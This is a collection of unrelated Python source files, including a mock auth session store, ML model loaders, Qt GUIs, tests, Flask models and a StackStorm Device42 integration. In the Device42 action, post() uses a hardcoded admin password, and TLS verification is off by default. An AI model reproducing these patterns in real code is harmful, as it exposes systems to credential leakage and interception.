s = self._tenant_to_session[tenant_id]
else:
s = self._new_session(token=token, tenant_id=tenant_id)
return s
def existing_session_for_token(self, token):
"""
:param unicode token: An authentication token previously created by
session_for_api_key, session_for_username_password, or
get_or_create_session_for_token.
:return: a session for the given token, only if that token already
exists.
:rtype: Session
:raise: :obj:`KeyError` if no such thing exists.
"""
if token in self._token_to_session:
return self._token_to_session[token]
raise KeyError(token)
def session_for_api_key(self, username, api_key, tenant_id=None):
"""
Create or return a :obj:`Session`.
:param unicode username: A user name.
:param unicode api_key: An API key that should match the username.
:return: a session for the given user.
:rtype: Session
"""
# One day, API keys will be different from passwords, but not today.
return self.session_for_username_password(username, api_key, tenant_id)
def session_for_username_password(self, username, password,
tenant_id=None):
"""
Create or return a :obj:`Session` based on a user's credentials.
"""
if username in self._username_to_token:
s = self._token_to_session[self._username_to_token[username]]
self._assert_tenant_matches(s, tenant_id)
return s
if tenant_id and tenant_id in self._tenant_to_session:
return self._tenant_to_session[tenant_id]
return self._new_session(username=username,
tenant_id=tenant_id)
def session_for_impersonation(self, username, expires_in, impersonator_token=None,
impersonated_token=None):
"""
Create or return a :obj:`Session` impersonating a given user; this
session updates the expiration to be that indicated.
"""
impersonator_session = self._token_to_session.get(impersonator_token)
session = self.session_for_username_password(
username, "lucky we don't check passwords, isn't it"
)
session.expires = datetime.utcfromtimestamp(self.clock.seconds() + expires_in)
session.impersonator_session_map[impersonated_token] = impersonator_session
self._token_to_session[impersonated_token] = session
return session
def session_for_tenant_id(self, tenant_id, token_id=None):
"""
Looks up a session based on the tenant_id.
:param unicode tenant_id: The tenant_id of a previously-created
session.
:param unicode token_id: Sets token in the session to the token_id provided,
else, creates one.
"""
if tenant_id not in self._tenant_to_session:
return self._new_session(tenant_id=tenant_id, token=token_id)
return self._tenant_to_session[tenant_id]
|
import numpy as np
import mxnet as mx
from mxnet.gluon.data import DataLoader
from mxnet.gluon.data.vision import transforms
from pathlib import Path
from .dataset import PrepareDataset
from .transforms import ResizeLong, NonNormalizedTensor
from ..mytypes import Detector, Detections
from typing import Sequence, Generator
def get_retina_det(prefix: Path,
epoch: int = 0,
resolution: int = 256,
batch_size: int = 1,
num_workers: int = 0,
ctx: mx.Context = mx.cpu()
) -> Detector:
sym, arg_params, aux_params = mx.model.load_checkpoint(str(prefix), epoch)
model = mx.mod.Module(symbol=sym, context=ctx, label_names=None)
data_shape = (1, 3, resolution, resolution)
model.bind(data_shapes=[('data', data_shape)], for_training=False)
model.set_params(arg_params, aux_params)
# warmup
data = mx.nd.zeros(data_shape)
model.forward(mx.io.DataBatch(data=(data,)), is_train=False)
model.get_outputs()[0].asnumpy()
# end of warmup
detector_transform = transforms.Compose([
ResizeLong(resolution),
NonNormalizedTensor()
])
def prepare_data(img_list: Sequence[Path]) -> DataLoader:
data = DataLoader(PrepareDataset(img_list).transform_first(detector_transform),
num_workers=num_workers,
batch_size=batch_size,
pin_memory=ctx.device_type == 'gpu',
last_batch='keep')
return data
def detect(img_list: Sequence[Path]) -> Generator[Detections, None, None]:
data = prepare_data(img_list)
for img_batch, idx_batch, width_batch, height_batch in data:
model.forward(mx.io.DataBatch(data=(img_batch.as_in_context(ctx),)), is_train=False)
results = model.get_outputs()[0].asnumpy()
scores = results[:, :, 1]
bboxes = results[:, :, 2:6]
landmarks = results[:, :, 6:]
num_landmarks = landmarks.shape[2] // 2
landmarks = landmarks.reshape((scores.shape[0], scores.shape[1], num_landmarks, 2))
for img_idx, width, height, cur_scores, cur_bboxes, cur_landmarks in \
zip(idx_batch, width_batch, height_batch, scores, bboxes, landmarks):
max_size = max(width.asnumpy(), height.asnumpy())
filtered_idx = cur_scores > 1e-6
cur_scores = cur_scores[filtered_idx]
cur_bboxes = cur_bboxes[filtered_idx] * max_size
cur_landmarks = cur_landmarks[filtered_idx] * max_size
yield cur_scores, cur_bboxes, cur_landmarks
return detect
def get_retina_mnet(*args, resolution: int = 256, **kwargs):
return get_retina_det(Path.home() / 'models' / f'det_mnet025_{resolution}', *args,
resolution=resolution, **kwargs)
def get_retina_resnet50(*args, resolution: int = 512, **kwargs):
return get_retina_det(Path.home() / 'models' / f'det_r50_{resolution}', *args, resolution=resolution, **kwargs)
|
"""
Author: Ioannis Paraskevakos
License: MIT
Copyright: 2018-2019
"""
from .discovery import Discovery # noqa:F401
from .image_disc import image_discovery # noqa:F401
|
'''
Created on Jun 18, 2018
@author: rameshpr
'''
from PyQt4 import QtCore, QtGui
import os
import cv2
import numpy as np
from libs import FeatureExtractor
from libs.common import image_path, Sizes, MODEL_TYPE
class MainWindow(QtGui.QMainWindow):
def __init__(self):
QtGui.QMainWindow.__init__(self)
self.i = 0
self.page_i = 0
self.layer_i = 0
self.__outs = None
self.__thread = FeatureExtractor(MODEL_TYPE.DENSENET161, median=0)
self.__thread.finished.connect(self.__finished)
self.images = [os.path.join(image_path, f) for f in os.listdir(image_path)]
self.images = [f for f in self.images if f.endswith(".jpg") and os.path.isfile(f)]
self.__setup()
def __load_features(self):
if self.__thread.isRunning():
return
self.__thread.set_image(self.images[self.i])
self.__thread.start()
def __next_img_button_clicked(self):
self.setEnabled(False)
self.i += 1
self.__load_features()
def __prev_img_button_clicked(self):
self.setEnabled(False)
self.i -= 1
if self.i < 0:
self.i = 0
self.__load_features()
def __layer_combobox_changed(self, index):
self.setEnabled(False)
self.layer_i = int(index)
self.show_images()
def __prev_sheet_button_clicked(self):
self.setEnabled(False)
self.page_i -= 1
if self.page_i < 0:
self.page_i = 0
self.show_images()
def __next_sheet_button_clicked(self):
self.setEnabled(False)
self.page_i += 1
self.show_images()
def __setup(self):
self.__load_features()
button_panel = QtGui.QWidget(self)
image_panel = QtGui.QWidget(self)
self.__qurryLabel = QtGui.QLabel(button_panel)
self.__qurryLabel.resize(Sizes.querry_x, Sizes.querry_y)
self.__qurryLabel.setScaledContents(True)
self.__qurryLabel.move(10, 15)
self.__prevImgButton = QtGui.QPushButton("Prev Image",button_panel)
self.__prevImgButton.clicked.connect(self.__prev_img_button_clicked)
self.__prevImgButton.resize(100, 25)
self.__prevImgButton.move(10, Sizes.querry_y + 25)
self.__nextImgButton = QtGui.QPushButton("Next Image",button_panel)
self.__nextImgButton.clicked.connect(self.__next_img_button_clicked)
self.__nextImgButton.resize(100, 25)
self.__nextImgButton.move(113, Sizes.querry_y + 25)
self.__selectLayerLabel = QtGui.QLabel("Select Layer",button_panel)
self.__selectLayerLabel.adjustSize()
self.__selectLayerLabel.move(10, Sizes.querry_y + 60)
self.__layerComboBox = QtGui.QComboBox(button_panel)
self.__layerComboBox.currentIndexChanged.connect(self.__layer_combobox_changed)
self.__layerComboBox.resize(100, 25)
self.__layerComboBox.move(113, Sizes.querry_y + 55)
self.__prevSheetButton = QtGui.QPushButton("Prev Sheet",button_panel)
self.__prevSheetButton.clicked.connect(self.__prev_sheet_button_clicked)
self.__prevSheetButton.resize(100, 25)
self.__prevSheetButton.move(10, Sizes.querry_y + 85)
self.__nextSheetButton = QtGui.QPushButton("Next Sheet",button_panel)
self.__nextSheetButton.clicked.connect(self.__next_sheet_button_clicked)
self.__nextSheetButton.resize(100, 25)
self.__nextSheetButton.move(113, Sizes.querry_y + 85)
self.__imageLabels = []
for i in range(Sizes.n_cols * Sizes.n_rows):
self.__imageLabels.append(QtGui.QLabel(image_panel))
self.__imageLabels[i].setScaledContents(True)
self.__imageLabels[i].resize(Sizes.image_x, Sizes.image_y)
x = i % Sizes.n_cols
y = int(i/Sizes.n_cols)
self.__imageLabels[i].move(3*(x+1) + Sizes.image_x*x, 3*(y+1) + Sizes.image_y*y)
self.__infoLabel = QtGui.QLabel("", self)
self.__infoLabel.adjustSize()
image_panel.resize(Sizes.n_cols*(Sizes.image_x+3), Sizes.n_rows*(Sizes.image_y+3))
button_panel.resize(max(Sizes.querry_x+20, 223), max(Sizes.querry_y + 110, image_panel.height()))
button_panel.move(0, 0)
self.__infoLabel.move(button_panel.width(), 0)
image_panel.move(button_panel.width(), 15)
self.setEnabled(False)
self.resize(image_panel.width() + button_panel.width() + 10, max(image_panel.height() + 20, button_panel.height()) + 10)
def show_images(self):
self.__infoLabel.setText("Image %s ::> Layer: %d and page: %d" % (self.images[self.i].split('/')[-1], self.layer_i, self.page_i))
self.__infoLabel.adjustSize()
for image_label in self.__imageLabels:
image_label.clear()
limit = len(self.__imageLabels)
j = 0
for i in range(self.page_i*limit, (self.page_i+1)*limit):
if len(self.__outs[self.layer_i][0].shape) < 3:
break
if i >= self.__outs[self.layer_i][0].shape[2]:
if i == self.page_i*limit:
self.page_i -= 1
self.show_images()
break
self.__imageLabels[j].setPixmap(self.convert_image(self.__outs[self.layer_i][0][:,:,i]))
j += 1
self.setEnabled(True)
def __finished(self):
if self.__thread is None:
return
self.__qurryLabel.setPixmap(self.convert_image(self.__thread.input_image))
self.__outs = self.__thread.outputs
if len(self.__layerComboBox) == 0:
self.__layerComboBox.addItems([str(i) for i in range(len(self.__outs))])
self.show_images()
def convert_image (self, cv_img):
cv_img = cv_img.astype(np.float32)
cv_img = cv_img - np.min(cv_img)
img_max = np.max(cv_img)
if img_max != 0:
cv_img = 255 * cv_img / img_max
cv_img = cv_img.astype(np.uint8)
if len(cv_img.shape) == 2:
cv_img = np.expand_dims(cv_img, axis=2)
cv_img = np.repeat(cv_img, 3, axis=2)
height, width, bytesPerComponent = cv_img.shape
bytesPerLine = bytesPerComponent * width;
cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB, cv_img)
return QtGui.QPixmap.fromImage(QtGui.QImage(cv_img.data, width, height, bytesPerLine, QtGui.QImage.Format_RGB888))
|
from ..utils import action, results_formatter
from functools import partial
import arep
import pytest
import os
results_formatter = partial(results_formatter, name=os.path.basename(__file__))
results_in_comprehension = results_formatter({
(3, 5)
})
results_regular = results_formatter({
(8, 8)
})
results_yield_from = results_formatter({
(12, 4)
})
all_results = (results_in_comprehension | results_regular | results_yield_from)
@pytest.fixture
def grepper():
engine = arep.Grepper(os.path.abspath('tests/data/Action/Yielding.py'))
return engine
@pytest.mark.parametrize(('in_expression'), [True, False, None])
@pytest.mark.parametrize(('from_'), [True, False, None])
@pytest.mark.parametrize(('consideration'), [True, None])
def test_Yielding(grepper, action, consideration, from_, in_expression):
if all([consideration, from_, in_expression]):
action.reset()
action.Yielding.in_expression = in_expression
action.Yielding.from_ = from_
action.Yielding.consideration = consideration
grepper.constraint_list.append(action)
if consideration is not False:
results = all_results.copy()
if from_:
results &= results_yield_from
elif from_ is False:
results -= results_yield_from
if in_expression:
results &= results_in_comprehension
elif in_expression is False:
results -= results_in_comprehension
assert set(grepper.all_results()) == results
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : AppZoo.
# @File : demo
# @Time : 2020/11/5 8:19 下午
# @Author : yuanjie
# @Email : yuanjie@xiaomi.com
# @Software : PyCharm
# @Description :
from appzoo import App
app = App()
if __name__ == '__main__':
app.add_route('/', lambda **kwargs: "Hello World", method="GET", result_key="result")
app.run(port=9955)
|
"""
models/scintrex.py
==================
PyQt model for Scintrex relative gravimeter data.
--------------------------------------------------------------------------------
NB: PyQt models follow the PyQt CamelCase naming convention. All other
methods/functions in GSadjust use PEP-8 lowercase_underscore convention.
This software is preliminary, provisional, and is subject to revision. It is
being provided to meet the need for timely best science. The software has not
received final approval by the U.S. Geological Survey (USGS). No warranty,
expressed or implied, is made by the USGS or the U.S. Government as to the
functionality of the software and related material nor shall the fact of release
constitute any such warranty. The software is provided on the condition that
neither the USGS nor the U.S. Government shall be held liable for any damages
resulting from the authorized or unauthorized use of the software.
"""
import numpy as np
from matplotlib.dates import num2date
from PyQt5 import QtCore
from PyQt5.QtCore import Qt, QModelIndex
# Constants for column headers
STATION_NAME, STATION_DATETIME, STATION_MEAN = range(3)
LOOP_NAME = 0
SURVEY_NAME = 0
ADJSTA_STATION, ADJSTA_G, ADJSTA_SD = range(3)
(
SCINTREX_STATION,
SCINTREX_DATE,
SCINTREX_G,
SCINTREX_SD,
SCINTREX_X_TILT,
SCINTREX_Y_TILT,
SCINTREX_TEMP,
SCINTREX_DUR,
SCINTREX_REJ,
) = range(9)
class ScintrexTableModel(QtCore.QAbstractTableModel):
"""
Model to store Scintrex data.
There is one ScintrexTableModel (or BurrisTableModel) per station occupation.
The model is created dynamically each time a station is selected in the tree
view on the data tab, rather than stored in memory.
The station position in the data hierarchy are stored, so that if a
modification is triggered, the original data can be accessed and changed
accordingly (keysurv,keyloop,keysta)
by default, all table entries are checked (this can be modified to allow
pre-check based on user criteria (tiltx, tilty,...)). Then, if one is
unchecked, the keepdata property of the ChannelList object at the table
row position is set to 0
Attributes
----------
_headers: table header
unchecked: a dictionary of unchecked items. Keys are item
indexes, entries are states
ChannelList_obj: an object of ChannelList-type: used to store the
table data as the structured data
arraydata: an array representation of the data from the
ChannelList_obj
"""
_headers = {
SCINTREX_STATION: "Station",
SCINTREX_DATE: "Date",
SCINTREX_G: "g (\u00b5gal)",
SCINTREX_SD: "sd (\u00b5gal)",
SCINTREX_X_TILT: "X Tilt",
SCINTREX_Y_TILT: "Y Tilt",
SCINTREX_TEMP: "Temp (K)",
SCINTREX_DUR: "dur (s)",
SCINTREX_REJ: "rej",
}
signal_update_coordinates = QtCore.pyqtSignal()
signal_adjust_update_required = QtCore.pyqtSignal()
signal_uncheck_station = QtCore.pyqtSignal()
signal_check_station = QtCore.pyqtSignal()
def __init__(self, ChannelList_obj, parent=None):
QtCore.QAbstractTableModel.__init__(self, parent)
self.unchecked = {}
self.createArrayData(ChannelList_obj)
def createArrayData(self, ChannelList_obj):
"""
Create the np array data for table display, and update the
ChannelList_obj.
"""
self.ChannelList_obj = ChannelList_obj
self.arraydata = np.concatenate(
(
ChannelList_obj.station,
np.array(ChannelList_obj.t),
np.array(ChannelList_obj.grav()),
np.array(ChannelList_obj.sd),
ChannelList_obj.tiltx,
ChannelList_obj.tilty,
ChannelList_obj.temp,
ChannelList_obj.dur,
ChannelList_obj.rej,
)
).reshape(len(ChannelList_obj.t), 9, order="F")
def rowCount(self, parent=None):
return len(self.ChannelList_obj.t)
def columnCount(self, parent):
return len(self._headers)
def flags(self, index):
return Qt.ItemIsUserCheckable | Qt.ItemIsEnabled | Qt.ItemIsSelectable
def data(self, index, role):
if not index.isValid():
return None
if role == Qt.DisplayRole:
# view definition
row = index.row()
column = index.column()
try:
value = float(self.arraydata[row][column])
except ValueError:
value = self.arraydata[row][column]
def format_datetime(dt):
return num2date(float(dt)).strftime("%Y-%m-%d %H:%M:%S")
fn, *args = {
SCINTREX_DATE: (format_datetime, value),
SCINTREX_REJ: (format, value, "2.0f"),
SCINTREX_DUR: (format, value, "3.0f"),
SCINTREX_G: (format, value, "8.1f"),
SCINTREX_SD: (format, value, "8.1f"),
}.get(column, (str, value))
return fn(*args)
if role == Qt.CheckStateRole:
# check status definition
if index.column() == 0:
return self.checkState(index)
def checkAll(self):
self.ChannelList_obj.keepdata = [1] * len(self.ChannelList_obj.raw_grav)
self.signal_adjust_update_required.emit()
self.layoutChanged.emit()
self.signal_check_station.emit()
self.dataChanged.emit(QModelIndex(), QModelIndex())
def uncheckAll(self):
self.ChannelList_obj.keepdata = [0] * len(self.ChannelList_obj.raw_grav)
self.signal_adjust_update_required.emit()
self.layoutChanged.emit()
self.signal_uncheck_station.emit()
self.dataChanged.emit(QModelIndex(), QModelIndex())
def checkState(self, index):
"""
By default, everything is checked. If keepdata property from the
ChannelList object is 0, it is unchecked
"""
if self.ChannelList_obj.keepdata[index.row()] == 0:
self.unchecked[index] = Qt.Unchecked
return self.unchecked[index]
else:
return Qt.Checked
def setData(self, index, value, role, silent=False):
# type: (object, object, object) -> object
"""
if a row is unchecked, update the keepdata value to 0 setData launched
when role is acting value is Qt.Checked or Qt.Unchecked
"""
if role == Qt.CheckStateRole and index.column() == 0:
if value == Qt.Checked:
self.ChannelList_obj.keepdata[index.row()] = 1
self.signal_check_station.emit()
elif value == Qt.Unchecked:
self.unchecked[index] = value
self.ChannelList_obj.keepdata[index.row()] = 0
if not any(self.ChannelList_obj.keepdata):
self.signal_uncheck_station.emit()
if not silent:
self.signal_adjust_update_required.emit()
self.dataChanged.emit(index, index)
return True
def headerData(self, section, orientation, role):
if role == Qt.DisplayRole and orientation == Qt.Horizontal:
return self._headers.get(section, section + 1)
|
# input = [5764801, 17807724]
input = [14222596, 4057428]
def transform(n, subject_number):
# set the value to itself multiplied by the subject number
n = n * subject_number
# set the value to the remainder after dividing the value by 20201227
_, remainder = divmod(n, 20201227)
return remainder
def loop_size(subject_number, key):
n = 1
cycles = 0
# with a little trial and error, work out the loop size
while n != key:
cycles += 1
n = transform(n, subject_number)
return cycles
def calculate_key(subject_number, loop_size):
n = 1
for _ in range(loop_size):
n = transform(n, subject_number)
return n
# star one
print(calculate_key(input[0], loop_size(7, input[1])))
|
from app import db
import json
import base64
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
#from enum import Enum
#class StatusEnum(Enum):
# off = "off"
# on = "on"
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key = True)
email = db.Column(db.String(120), index = True, unique = True)
password_hash = db.Column(db.String(128))
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
class Token(db.Model):
id = db.Column(db.Integer, primary_key = True)
token = db.Column(db.String(64))
enabled = db.Column(db.Boolean, default=True)
def __repr__(self):
return self.token
class Repository(db.Model):
id = db.Column(db.Integer, primary_key = True)
key = db.Column(db.String(90))
watcher_id = db.Column(db.Integer, db.ForeignKey('watcher.id'))
watcher = db.relationship("Watcher", back_populates="repositories")
create = db.Column(db.DateTime)
add = db.Column(db.DateTime)
push = db.Column(db.DateTime)
text_raw = db.Column(db.Text(convert_unicode = True))
text = db.Column(db.Text(convert_unicode = True))
def __repr__(self):
return self.text
class Watcher(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(100))
repository = db.Column(db.Boolean, default=False)
push = db.Column(db.Boolean, default=False)
push_params = db.Column(db.JSON)
params = db.Column(db.JSON)
service_id = db.Column(db.Integer, db.ForeignKey('service.id'))
service = db.relationship("Service", back_populates="watchers")
application_id = db.Column(db.Integer, db.ForeignKey('application.id'))
application = db.relationship("Application", back_populates="watchers")
repositories = db.relationship("Repository", order_by=Repository.id, back_populates="watcher")
def __repr__(self):
return self.name
class Service(db.Model):
id = db.Column(db.Integer, primary_key = True)
api = db.Column(db.String(100), nullable=False)
status = db.Column(db.DateTime)
params = db.Column(db.JSON)
watchers = db.relationship("Watcher", order_by=Watcher.id, back_populates="service", cascade="all, delete, delete-orphan")
def __repr__(self):
return self.api
class Application(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(100), nullable=False)
status = db.Column(db.DateTime)
params = db.Column(db.JSON)
watchers = db.relationship("Watcher", order_by=Watcher.id, back_populates="application")
def __repr__(self):
return self.name
|
import warnings
from weylchamber import closest_LI, c1c2c3
import qutip
def test_closest_LI_trivial_powell():
"""Test that a gate exactly at (c1, c2, c3) is in fact closest to itself"""
warnings.filterwarnings(
'ignore', message='the matrix subclass is not the recommended way')
CNOT = qutip.gates.cnot()
U = closest_LI(CNOT, *c1c2c3(CNOT), method='Powell')
assert isinstance(U, qutip.Qobj)
assert (CNOT - U).norm() < 1e-15
def test_closest_LI_trivial_leastsq():
"""Test that a gate exactly at (c1, c2, c3) is in fact closest to itself"""
warnings.filterwarnings(
'ignore', message='the matrix subclass is not the recommended way')
CNOT = qutip.gates.cnot()
U = closest_LI(CNOT, *c1c2c3(CNOT), method='leastsq')
assert isinstance(U, qutip.Qobj)
assert (CNOT - U).norm() < 1e-15
|
import requests
from st2common.runners.base_action import Action
from urlparse import urlparse
class Device42BaseException(Exception):
pass
class BaseAction(Action):
def __init__(self, config):
super(BaseAction, self).__init__(config)
self.d42_server = self.config.get('d42_server', None)
# self.d42_server += self.config.get('d42_api_path', None)
if not self.d42_server:
raise ValueError('"d42_server" config value is required')
# d42_server should be aproximately -> https://00.00.00.00/api/1.0/
self.d42_username = self.config.get('d42_username', None)
if not self.d42_username:
raise ValueError('"d42_username" config value is required')
self.d42_password = self.config.get('d42_password', None)
if not self.d42_password:
raise ValueError('"d42_password" config value is required')
self.verify = self.config.get('verify_certificate', False)
self.headers = {
'Accept': 'application/json',
'Content-Type': 'application/json'
}
def getAPI(self, endpoint, params, headers=None):
if headers is None:
headers = self.headers
r = requests.get(
"%s%s" % (self.d42_server, endpoint),
params=params,
auth=(self.d42_username, self.d42_password),
verify=self.verify,
headers=headers
)
if r.ok:
return r.json()
else:
return r
def putAPI(self, endpoint, params=None, payload=None):
r = requests.put(
"%s%s" % (self.d42_server, endpoint),
params=params,
data=payload,
auth=(self.d42_username, self.d42_password),
verify=self.verify
)
if r.ok:
return r.json()
else:
return r
def postAPI(self, endpoint, params=None, payload=None):
r = requests.post(
"%s%s" % (self.d42_server, endpoint),
params=params,
data=payload,
auth=(self.d42_username, self.d42_password),
verify=self.verify
)
if r.ok:
return r.json()
else:
return r
def post(
self,
endpoint,
headers=None,
params=None,
payload=None,
doql_query=None
):
# allow for the doql_query input parameter to call D42 via the
# doql API URI not the regular API
if doql_query is True:
d42_url_split = urlparse(self.d42_server)
d42_server = "%s://%s/" % (
d42_url_split.scheme, d42_url_split.netloc
)
print("d42_server: %s" % d42_server)
else:
d42_server = self.d42_server
url = "%s%s" % (d42_server, endpoint)
r = requests.post(
url=url,
auth=('admin', 'adm!nd42'),
headers=headers,
params=params,
data=payload,
verify=self.verify,
)
print("url: %s" % url)
if r.ok:
if doql_query is True:
return r
else:
return r.json()
else:
return r
|
import unittest
from requests import Session
from adapter import p
from spoofbot.adapter.har import HarCache
class HarProxyTest(unittest.TestCase):
session: Session = None
adapter: HarCache = None
@classmethod
def setUpClass(cls) -> None:
cls.adapter = HarCache(
p / 'test_data/www.wuxiaworld.com_Archive_ALL.har',
match_headers=False,
match_header_order=False,
match_data=False,
)
cls.adapter.is_offline = True
cls.session = Session()
cls.session.mount('http://', cls.adapter)
cls.session.mount('https://', cls.adapter)
def test_hit(self):
self.adapter.delete_after_hit = False
self.assertIsNotNone(self.session.get("https://www.wuxiaworld.com/novels"))
self.assertIsNotNone(self.session.get("https://www.wuxiaworld.com/novels"))
def test_delete(self):
self.assertIsNotNone(
self.session.get("https://www.wuxiaworld.com/profile/karma"))
self.adapter.delete_after_hit = True
self.assertIsNotNone(
self.session.get("https://www.wuxiaworld.com/profile/karma"))
with self.assertRaises(Exception):
self.session.get("https://www.wuxiaworld.com/profile/karma")
def test_strict(self):
self.adapter.match_headers = True
self.adapter.match_header_order = False
self.adapter.match_data = True
self.adapter.delete_after_hit = True
self.assertIsNotNone(self.session.get("https://www.wuxiaworld.com/", headers={
'Host': 'www.wuxiaworld.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'TE': 'Trailers'
}))
with self.assertRaises(Exception):
self.assertIsNotNone(
self.session.get("https://www.wuxiaworld.com/", headers={
'Host': 'www.wuxiaworld.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}))
|
import gym
import pandas as pd
import datetime
from recogym.agents import OrganicUserEventCounterAgent, organic_user_count_args
from recogym import build_agent_init
from recogym.agents import Agent
from recogym import Configuration
from recogym import (
gather_agent_stats,
AgentStats
)
from recogym import env_1_args
def produce_agent_stats(
env,
std_env_args,
agent: Agent,
num_products: int,
num_organic_users_to_train: int,
num_users_to_train: int,
num_users_to_score: int,
random_seed: int,
agent_class,
agent_configs,
agent_name: str,
with_cache: bool,
):
stat_epochs = 1
stat_epochs_new_random_seed = True
training_data_samples = tuple([num_users_to_train])
testing_data_samples = num_users_to_score
time_start = datetime.datetime.now()
agent_stats = gather_agent_stats(
env,
std_env_args,
{
'agent': agent,
},
{
**build_agent_init(
agent_name,
agent_class,
{
**agent_configs,
'num_products': num_products,
}
),
},
training_data_samples,
testing_data_samples,
stat_epochs,
stat_epochs_new_random_seed,
num_organic_users_to_train,
with_cache
)
q0_025 = []
q0_500 = []
q0_975 = []
for agent_name in agent_stats[AgentStats.AGENTS]:
agent_values = agent_stats[AgentStats.AGENTS][agent_name]
q0_025.append(agent_values[AgentStats.Q0_025][0])
q0_500.append(agent_values[AgentStats.Q0_500][0])
q0_975.append(agent_values[AgentStats.Q0_975][0])
time_end = datetime.datetime.now()
seconds = (time_end - time_start).total_seconds()
return pd.DataFrame(
{
'q0.025': q0_025,
'q0.500': q0_500,
'q0.975': q0_975,
'time': [seconds],
}
)
def create_agent_and_env_sess_pop(
num_products: int,
num_organic_users_to_train: int,
num_users_to_train: int,
num_users_to_score: int,
random_seed: int,
latent_factor: int,
num_flips: int,
log_epsilon: float,
sigma_omega: float,
agent_class,
agent_configs,
agent_name: str,
with_cache: bool,
reverse_pop=False
):
std_env_args = {
**env_1_args,
'random_seed': random_seed,
'num_products': num_products,
'K': latent_factor,
'sigma_omega': sigma_omega,
'number_of_flips': num_flips
}
env = gym.make('reco-gym-v1')
sess_pop_agent = OrganicUserEventCounterAgent(Configuration({
**organic_user_count_args,
**std_env_args,
'select_randomly': True,
'epsilon': log_epsilon,
'num_products': num_products,
'reverse_pop': reverse_pop
}))
return env, std_env_args, sess_pop_agent
def eval_against_session_pop(
num_products: int,
num_organic_users_to_train: int,
num_users_to_train: int,
num_users_to_score: int,
random_seed: int,
latent_factor: int,
num_flips: int,
log_epsilon: float,
sigma_omega: float,
agent_class,
agent_configs,
agent_name: str,
with_cache: bool,
):
env, std_env_args, agent = create_agent_and_env_sess_pop(num_products,
num_organic_users_to_train,
num_users_to_train,
num_users_to_score,
random_seed,
latent_factor,
num_flips,
log_epsilon,
sigma_omega,
agent_class,
agent_configs,
agent_name,
with_cache,
)
return produce_agent_stats(env, std_env_args, agent, num_products, num_organic_users_to_train, num_users_to_train, num_users_to_score, random_seed, agent_class, agent_configs, agent_name, with_cache)
def first_element(sc, name):
sc['model'] = name
sc['q0.025'] = sc['q0.025'][0]
sc['q0.500'] = sc['q0.500'][0]
sc['q0.975'] = sc['q0.975'][0]
print(sc)
return sc
|
# @Author : FederalLab
# @Date : 2021-09-25 16:52:03
# @Last Modified by : Chen Dengsheng
# @Last Modified time: 2021-09-25 16:52:03
# Copyright (c) FederalLab. All rights reserved.
from typing import List
import numpy as np
from openfed.utils import tablist
def samples_distribution(federated_dataset, verbose: bool = True) -> List:
r"""Generates a simple statistic information about the given dataset.
Args:
federated_dataset: The given dataset.
verbose: If ``True``, print a digest information about the dataset.
Returns:
List contains each part's samples.
"""
total_parts = federated_dataset.total_parts
parts_list = []
for p in range(total_parts):
federated_dataset.set_part_id(p)
parts_list.append(len(federated_dataset))
if verbose:
rdict = dict(
Parts=total_parts,
Samples=sum(parts_list),
Mean=np.mean(parts_list),
Var=np.var(parts_list),
)
print(
tablist(
head=list(rdict.keys()),
data=list(rdict.values()),
force_in_one_row=True,
))
return parts_list
|
from dataclasses import dataclass
from pathlib import Path
import os
import tempfile
from django.apps import apps
from django.conf import settings
from django.core.files.images import ImageFile
from django.utils.translation import gettext_lazy as _
import PIL as pillow
###############################################################################
# Image model and related stuff
###############################################################################
def img_upload_to(instance, filename):
"""
Calculate the upload destination for an image file.
"""
config = apps.get_app_config("webquills")
folder_name = config.get_image_media_dir()
filename = Path(filename).name
filename = instance.file.field.storage.get_valid_name(filename)
# Truncate filename so it fits in the 100 character limit
# https://code.djangoproject.com/ticket/9893
full_path = os.path.join(folder_name, filename)
if len(full_path) >= 95:
chars_to_trim = len(full_path) - 94
prefix, extension = os.path.splitext(filename)
filename = prefix[:-chars_to_trim] + extension
full_path = os.path.join(folder_name, filename)
return full_path
# instance may be passed as positional, other kwargs are keyword-only
def resize_image(instance: "Image", *, width: int = None, height: int = None):
"Generate a resized version of Image maintaining the same aspect ratio"
app = apps.get_app_config("webquills")
op_name = "resize"
imagedir = app.get_image_media_dir()
# We know the op_name, now work out the arguments
# Called without a size, use our default size.
if width is None and height is None:
width, height = app.get_default_image_size()
# Called with only one, calculate the other based on aspect ratio
if width is None or height is None:
aspect_ratio = instance.width / instance.height
if height:
width = int(height * aspect_ratio)
else:
height = int(width / aspect_ratio)
# If the image already fits in the box, just return it, don't upscale
if instance.width < width and instance.height < height:
return instance.file.name
storage = instance.file.storage
newname = instance.file.name.replace(imagedir, f"img-{op_name}-{width}x{height}")
newname = storage.generate_filename(newname)
with instance.open_file() as img_file:
image = pillow.Image.open(img_file).copy() # open original image
image.thumbnail([width, height]) # transform in memory
# Store to local file. Suffix needed for img format detection
tmpfile = tempfile.NamedTemporaryFile(
"wb", delete=False, suffix=Path(newname).suffix
)
image.save(tmpfile, format=image.format)
# To reopen, some platforms require close
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
tmpfile.close()
# Hand the tmpfile to the image storage. Must have valid img suffix e.g. .jpg
saved_as = storage.save(newname, ImageFile(open(tmpfile.name, "rb")))
return saved_as
def fillcrop_image(instance: "Image", *, width: int, height: int):
"Generate a resized version of Image cropped to the specified aspect ratio"
app = apps.get_app_config("webquills")
